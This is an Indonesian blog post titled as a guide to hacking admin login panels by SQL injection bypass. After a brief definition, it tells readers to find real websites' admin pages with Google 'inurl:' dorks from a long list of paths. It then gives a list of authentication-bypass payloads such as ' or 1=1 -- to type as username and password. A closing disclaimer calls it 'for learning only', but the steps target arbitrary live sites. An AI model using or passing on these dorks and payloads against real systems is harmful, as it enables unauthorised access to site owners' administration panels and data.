Cara Hack Login Admin Panel Dengan Bypass SQl Ijnection

Hai sobat!!
Bertemu lagi ama saya diblog sederhana ini. Kali ini saya akan share mengenai SQl Injection. Sebelumnya, apa itu SQl Injection??

SQl Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yanglebih umum yang dapat terjadi setiap kali sebuahbahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)

SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS

SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)

Okelah, gak usah ceramah lagi. Langsung simak caranya :

1. Pergi ke www.google.com
2. Tulis dork nya. Misal inurl:kode_url . tulisan kode_url bisa diganti dengan kode berikut :

admin1.php --- admin1.html --- admin2.php --- admin2.html --- yonetim.php --- yonetim.html --- yonetici.phpy --- onetici.html --- admin/account.php --- admin/account.html --- admin/index.php --- admin/index.html --- admin/login.php --- admin/login.html --- admin/home.php --- admin/controlpanel.html --- admin/controlpanel.php --- admin.php --- admin.html --- admin/cp.php --- admin/cp.html --- cp.php --- cp.html --- administrator/administrator/index.html --- administrator/index.php --- administrator/login.html --- administrator/login.php --- administrator/account.html --- administrator/account.php --- administrator.php --- administrator.html --- login.html --- modelsearch/login.php --- moderator.php --- moderator.html --- moderator/login.php --- moderator/login.html --- moderator/admin.php --- moderator/admin.html --- account.php --- account.html --- controlpanel/controlpanel.php --- controlpanel.html --- admincontrol.php --- admincontrol.html --- adminpanel.php --- adminpanel.html --- admin1.asp --- admin2.asp --- yonetim.asp --- yonetici.asp --- admin/account.asp --- admin/index.asp --- admin/login.asp --- admin/home.asp --- admin/controlpanel.asp --- admin.asp --- admin/cp.asp --- cp.asp --- administrator/index.asp --- administrator/login.asp --- administrator/account.asp --- administrator.asp --- login.asp --- modelsearch/login.asp --- moderator.asp --- moderator/login.asp --- moderator/admin.asp --- account.asp --- controlpanel.asp --- admincontrol.asp --- adminpanel.asp --- fileadmin/fileadmin.php --- fileadmin.asp --- fileadmin.html --- administration/administration.php --- administration.html --- sysadmin.php --- sysadmin.html --- wp-admin/ --- wp-login/

Pilih salah satu dari kode-kode diatas. Misal admin.asp. Maka, dork nya menjadi inurl:admin.asp lalu pastekan di kotak pencarian Google dan cari (Enter) !!
3. Lalu pilih halaman login admin panel yang muncul. 4. Lalu sobat akan disuguhi form login (Username dan Password). Pilih salah satu diantara kode-kode dibawah ini :

‘ or 1=1 – --- 1'or’1'=’1 --- admin’– --- ” or 0=0 – --- or 0=0 – --- ‘ or 0=0 # --- ” or 0=0 # --- or 0=0 # --- ‘ or ‘x’='x --- ” or “x”=”x --- ‘) or (‘x’='x --- ‘ or 1=1– --- ” or 1=1– --- or 1=1– --- ‘ or a=a– --- ” or “a”=”a --- ‘) or (‘a’='a --- “) or (“a”=”a --- hi” or “a”=”a --- hi” or 1=1 – --- hi’ or 1=1 – --- hi’ or ‘a’='a --- hi’) or (‘a’='a --- hi”) or (“a”=”)

Misal kamu memilih kode 1'or'1'='1, maka gunakan kode tsb sebagai Username sekaligus Password untuk loginnya.

INGAT!!! Tidak semua kode Username+Password tsb bekerja pada semua website. Hanya beberapa yang work untuk beberapa website Jadi, 1 kode hanya untuk website tertentu.

NB : Semua tindakan yang Kamu lakukan menggunakan trik ini adalah tanggung jawab kamu sepenuhnya. Saya share trik ini hanya untuk teknik pembelajaran saja. Saya tidak bertanggung jawab !!

Okelah, itu saja yang dapat saya bagikan.
Wassalamu'alaikum wr. wb.